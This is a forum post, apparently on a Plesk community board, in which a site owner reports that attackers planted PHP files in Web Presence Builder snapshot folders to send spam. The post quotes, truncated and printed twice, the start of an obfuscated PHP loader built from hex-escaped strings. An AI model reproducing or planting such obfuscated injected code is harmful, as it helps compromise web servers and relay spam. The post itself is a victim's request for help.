Facebook
Twitter
AlexandreS
New Pleskian
Hello
I'm having problems with hackers, and it looks like they are targeting sites made with Web Presence Builder.
They are able to put some PHP files on the site's directory and then use it to send spam.
It looks like they can inject and execute PHP code in files like this:
......./httpdocs/data/snapshots/dd6520eaa764cf545f83e23869286126.php
This file's first lines are like this now:
----------------
<?php $gf1de = 190;$GLOBALS['ua2ed']=Array();global$ua2ed;$ua2ed=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['a9a65']="\x3b\x7e\x4e\x6e\x2c\x2f\x30\x46\x79\x4f\x21\x68\x78\x2b\x5a\x42\x59\xa\x6a\x63\x74\x34\x39\x7a\x32\x26\x52\x43\x61\x53\x3e\x33\x45\x76\x31\x60\x40\x22\x4a\x23\x65\x41\x49\x27\x6d\x71\x2a\x7b\x7d\x67\x72\x6c\x73\x3a\x50\x37\x6f\x25\x2e\x5e\x3c\x7c\x70\........
----------------
Right bellow this PHP code I can see the usual gibberish text that looks like an sqlite database.
What can be wrong? Anyone else is having this issue?
Thanks
Alexandre
I'm having problems with hackers, and it looks like they are targeting sites made with Web Presence Builder.
They are able to put some PHP files on the site's directory and then use it to send spam.
It looks like they can inject and execute PHP code in files like this:
......./httpdocs/data/snapshots/dd6520eaa764cf545f83e23869286126.php
This file's first lines are like this now:
----------------
<?php $gf1de = 190;$GLOBALS['ua2ed']=Array();global$ua2ed;$ua2ed=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['a9a65']="\x3b\x7e\x4e\x6e\x2c\x2f\x30\x46\x79\x4f\x21\x68\x78\x2b\x5a\x42\x59\xa\x6a\x63\x74\x34\x39\x7a\x32\x26\x52\x43\x61\x53\x3e\x33\x45\x76\x31\x60\x40\x22\x4a\x23\x65\x41\x49\x27\x6d\x71\x2a\x7b\x7d\x67\x72\x6c\x73\x3a\x50\x37\x6f\x25\x2e\x5e\x3c\x7c\x70\........
----------------
Right bellow this PHP code I can see the usual gibberish text that looks like an sqlite database.
What can be wrong? Anyone else is having this issue?
Thanks
Alexandre
